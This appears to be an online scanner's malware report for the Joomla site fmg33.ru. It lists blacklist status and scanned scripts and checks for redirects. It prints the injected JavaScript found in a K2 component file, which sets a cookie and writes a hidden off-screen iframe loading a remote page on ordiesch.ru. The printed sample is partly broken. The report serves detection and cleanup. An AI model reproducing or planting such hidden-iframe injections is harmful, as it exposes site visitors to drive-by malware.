Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fmg33.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fmg33.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fmg33.ru/ | 200 OK Content-Length: 71742 Content-Type: text/html | clean |
http://fmg33.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 47930 Content-Type: application/javascript | clean |
http://fmg33.ru/media/system/js/core.js | 200 OK Content-Length: 15 Content-Type: application/javascript | clean |
http://fmg33.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 12 Content-Type: application/javascript | clean |
http://fmg33.ru/media/system/js/modal.js | 200 OK Content-Length: 11 Content-Type: application/javascript | clean |
http://fmg33.ru/media/k2/assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 47804 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 988 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
    (function(){
        function stripos (f_haystack, f_needle, f_offset) {
            var haystack = (f_haystack + '').toLowerCase();
            var needle = (f_needle + '').toLowerCase();
            var index = 0;
            if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
                return index;
            }
            return false;
        }
        function setCookie(name, value, expires) {
            var date = new Date( new Date().getTime() + expires*1000 );
            document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
            return matches ? decodeURIComponent(matches[1]) : undefined;
        }
        var cookie = getCookie('uca1872lat');
        if (cookie == undefined) {
            setCookie('uca1872lat', true, 292200);
            document.write('<iframe style="position:absolute;left:-999px;top:-999px;" height="119" width="119" src="http://ordiesch.ru/comprehensive.html?2"></iframe>');
        }
    })();
Antivirus reports:
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://fmg33.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 50 Content-Type: application/javascript | clean |
http://fmg33.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 16 Content-Type: application/javascript | clean |
http://fmg33.ru/media/com_acymailing/js/acymailing_module.js | 200 OK Content-Length: 10354 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_chronoforms/js/formcheck/formcheck-yui.js | 200 OK Content-Length: 1291 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_chronoforms/js/formcheck/formcheck-max.js | 200 OK Content-Length: 4097 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_chronoforms/js/formcheck/lang/ru.js | 200 OK Content-Length: 55 Content-Type: application/javascript | clean |
http://userapi.com/js/api/openapi.js?49 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fmg33.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Wed, 17 Sep 2014 06:36:27 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Length: 71742
Content-Type: text/html;charset=utf-8
Expires: Fri, 19 Sep 2014 00:00:00 GMT
Last-Modified: Tue, 16 Sep 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.29
...71742 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fmg33.ru
Referer: http://www.google.com/search?q=fmg33.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.